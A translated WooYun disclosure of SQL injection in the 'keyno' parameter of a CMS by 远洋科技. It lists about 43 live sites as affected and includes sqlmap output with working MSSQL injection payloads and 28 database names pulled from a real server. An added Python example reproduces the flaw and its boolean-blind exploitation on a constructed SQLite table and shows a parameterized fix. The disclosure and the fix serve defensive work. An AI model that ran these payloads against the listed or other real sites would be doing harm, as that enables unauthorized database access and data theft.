
Vulnerability Summary

Defect ID: wooyun-2014-080552

Title: SQL injection vulnerability in a website-building (CMS) system

Vendor: 远洋科技

Author: 老和尚

Submitted: 2014-10-26 22:53

Fix time: 2015-01-24 22:54

Disclosed: 2015-01-24 22:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2014-10-26: Details sent to the vendor, awaiting vendor handling
2014-10-31: Vendor confirmed; details visible to the vendor only
2014-11-03: Details opened to third-party security partners
2014-12-25: Details opened to core white hats and domain experts
2015-01-04: Details opened to regular white hats
2015-01-14: Details opened to intern white hats
2015-01-24: Details disclosed to the public

Brief description:

123456

Detailed description:

#1. A CMS developed by 远洋科技 (http://www.8ycn.com/) is used by a large number of websites, and all of them share the same injection vulnerability. This is the second report on it.
Second round: this one was missed the first time. I dug some more and found more.
Affected pages:
http://www.lushengmetal.com/en/products_display.php?keyno=30313
http://www.tianjianchina.com/products_display.php?keyno=29874
http://www.sdxcgd.com/products_display.php?keyno=51467
http://www.sdxinlei.com/products_display.php?keyno=53691
http://www.bzbinhai.com/products_display.php?keyno=52243
http://www.sdmlw.com/products_display.php?keyno=34854
http://www.sdxhyz.com/products_display.php?keyno=51717
http://www.sdsxmm.com/products_display.php?keyno=51831
http://pengxian.8ycn.com.cn/products_display.php?keyno=
http://www.bzjdqd.com/products_display.php?keyno=52400
http://www.sdjwd.com/products_display.php?keyno=31240
http://www.sdyssw.com/products_display.php?keyno=61807
http://www.bztianma.com/products_display.php?keyno=51838
http://www.bzajst.com/products_display.php?keyno=52015
http://www.xhzxsw.com/products_display.php?keyno=51595
http://www.bzjzlxs.com/products_display.php?keyno=52057
http://www.bzsdmm.com/products_display.php?keyno=39411
http://www.cnynmy.com/products_display.php?keyno=53349
http://www.bzglsm.com/products_display.php?keyno=32313
http://www.dubangchuye.com/products_display.php?keyno=64251
http://www.bzdelixi.com/products_display.php?keyno=50282
http://www.bzqezl.com/products_display.php?keyno=36732
http://www.hmbaila.com/products_display.php?keyno=51134
http://www.wdxzx.com/products_display.php?keyno=37216
http://www.mituofo.net/products_display.php?keyno=37128
http://www.sdcfcg.com/products_display.php?keyno=35098
http://www.cnjjgm.com/products_display.php?keyno=41677
http://www.bzfyzl.com/products_display.php?keyno=50765
http://www.txjzy.com/products_display.php?keyno=52747
http://www.sdmdxg.com/products_display.php?keyno=39539
http://www.sdcymc.com/products_display.php?keyno=28094
http://www.sdhyjx888.com/products_display.php?keyno=36076
http://zhzzdz.com/products_display.php?keyno=58229
http://www.sdjsqjt.com/products_display.php?keyno=45443
http://huoguoyu.com/products_display.php?keyno=47006
http://bzxsdbj.cn/products_display.php?keyno=53870
http://www.bzbingang.com/products_display.php?keyno=59177
http://www.hmlxmy.com/products_display.php?keyno=51369
http://www.ysddc.com/products_display.php?keyno=51641
http://www.zphbsjc.com/products_display.php?keyno=42053
http://www.sdchunxiang.com/products_display.php?keyno=9926
http://www.bzbygc.com/products_display.php?keyno=41705
http://www.kdspjx.com/products_display.php?keyno=37753
There are many more cases like these.

Proof of vulnerability:

[Screenshot: QQ图片20141024082346.jpg]

[Screenshot: QQ图片20141024082410.jpg]

Just go wild on it with Pangolin (穿山甲).

GET parameter 'keyno' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 52 HTTP(s) requests:
---
Place: GET
Parameter: keyno
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyno=9926 AND 2281=2281

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keyno=9926 AND 4352=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(103)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4352=4352) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(106)+CHAR(97)+CHAR(113)))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keyno=9926; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keyno=9926 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: keyno=(SELECT CHAR(113)+CHAR(120)+CHAR(103)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1477=1477) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(106)+CHAR(97)+CHAR(113))
---
[13:59:33] [INFO] testing Microsoft SQL Server
[13:59:34] [INFO] confirming Microsoft SQL Server
[13:59:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.1
back-end DBMS: Microsoft SQL Server 2000
[13:59:37] [INFO] fetching database names
[13:59:38] [INFO] the SQL query used returns 28 entries
[13:59:39] [INFO] retrieved: agent
[13:59:40] [INFO] retrieved: auction
[13:59:41] [INFO] retrieved: axqy
[13:59:41] [INFO] retrieved: binzhouyuanlin
[13:59:42] [INFO] retrieved: bxxsp
[13:59:43] [INFO] retrieved: bysbd
[13:59:44] [INFO] retrieved: bzyrcrm
[13:59:45] [INFO] retrieved: crm
[13:59:46] [INFO] retrieved: hmrc
[13:59:46] [INFO] retrieved: ispdata
[13:59:47] [INFO] retrieved: jfcx
[13:59:48] [INFO] retrieved: master
[13:59:49] [INFO] retrieved: menhuagent
[13:59:50] [INFO] retrieved: model
[13:59:51] [INFO] retrieved: msdb
[13:59:51] [INFO] retrieved: newbeian
[13:59:52] [INFO] retrieved: newbeiangcl
[13:59:53] [INFO] retrieved: newgclcrm
[13:59:54] [INFO] retrieved: newpaimai
[13:59:55] [INFO] retrieved: Northwind
[13:59:55] [INFO] retrieved: pubs
[13:59:56] [INFO] retrieved: snmdb
[13:59:57] [INFO] retrieved: tempdb
[13:59:58] [INFO] retrieved: toupiao
[13:59:59] [INFO] retrieved: wyww
[14:00:00] [INFO] retrieved: wywwagent
[14:00:01] [INFO] retrieved: yantai
[14:00:01] [INFO] retrieved: yantaiceshi
available databases [28]:
[*] agent
[*] auction
[*] axqy
[*] binzhouyuanlin
[*] bxxsp
[*] bysbd
[*] bzyrcrm
[*] crm
[*] hmrc
[*] ispdata
[*] jfcx
[*] master
[*] menhuagent
[*] model
[*] msdb
[*] newbeian
[*] newbeiangcl
[*] newgclcrm
[*] newpaimai
[*] Northwind
[*] pubs
[*] snmdb
[*] tempdb
[*] toupiao
[*] wyww
[*] wywwagent
[*] yantai
[*] yantaiceshi
[14:00:02] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\www.sdchunxiang.com'

Fix:

Filter the parameter.
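The sqlmap run above shows why "filter the parameter" has to mean more than a blacklist: keyno is a numeric id, so the first payload sqlmap landed (keyno=9926 AND 2281=2281) needs no quotes at all, and the same single connection could enumerate 28 databases on the shared server. The following is an added example, not code from 远洋科技 or from the report. It reconstructs the vulnerable pattern (the raw GET value spliced into the WHERE clause of a products_display.php-style lookup) against an in-memory SQLite table that stands in for the MSSQL 2000 backend, drives the boolean-based blind oracle the way sqlmap did, and shows the hardened version. The table, the rows and the function names are all constructed for this example; SQLite has no WAITFOR or CONVERT, so the time-based and error-based vectors from the report are not reproduced.

```python
import re
import sqlite3
from typing import List

# Constructed sample data; the keyno values echo the ones in the report.
SAMPLE_ROWS = [(9926, "Sample product A"), (30313, "Sample product B")]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite table standing in for the site's product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (keyno INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, keyno: str) -> List[str]:
    """Vulnerable pattern: the raw GET value is spliced into the SQL text.
    'keyno=9926 AND 2281=2281' renders the same page as 'keyno=9926', while
    'keyno=9926 AND 2281=2282' renders an empty one: a boolean oracle."""
    sql = f"SELECT name FROM products WHERE keyno={keyno}"
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn: sqlite3.Connection, keyno: str) -> List[str]:
    """Fixed pattern: allow-list the shape of the value, then bind it as a
    parameter so the driver never lets it become part of the SQL grammar."""
    if not re.fullmatch(r"\d{1,10}", keyno):
        raise ValueError("keyno must be a decimal integer")
    sql = "SELECT name FROM products WHERE keyno=?"
    return [row[0] for row in conn.execute(sql, (int(keyno),))]


def blind_probe(conn, lookup, keyno: str, condition: str) -> bool:
    """True if appending ' AND <condition>' leaves the response unchanged,
    i.e. the condition evaluated true on the database side."""
    baseline = lookup(conn, keyno)
    probed = lookup(conn, f"{keyno} AND {condition}")
    return bool(baseline) and probed == baseline


def infer_row_count(conn, keyno: str = "9926", limit: int = 50) -> int:
    """Exfiltrate a value one yes/no question at a time, the way sqlmap's
    boolean-based blind technique pulled the 28 database names in the report.
    Returns -1 if no candidate in 0..limit matches."""
    for n in range(limit + 1):
        condition = f"(SELECT count(*) FROM products)={n}"
        if blind_probe(conn, lookup_vulnerable, keyno, condition):
            return n
    return -1


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "9926 AND 2281=2281"))  # product still shown
    print(lookup_vulnerable(db, "9926 AND 2281=2282"))  # nothing shown
    print("rows inferred blind:", infer_row_count(db))
    try:
        lookup_hardened(db, "9926 AND 2281=2281")
    except ValueError as exc:
        print("hardened lookup rejected payload:", exc)
```

The allow-list check alone would already stop every payload in the sqlmap output, but the parameter binding is what makes the fix hold when the next integer-looking field turns out to accept strings; both belong in the fix, and the same binding should replace concatenation in every query the CMS builds, not only the one on products_display.php.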

Copyright notice: please credit the source when reposting: 老和尚@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2014-10-31 17:37

Vendor reply:

Latest status:

None yet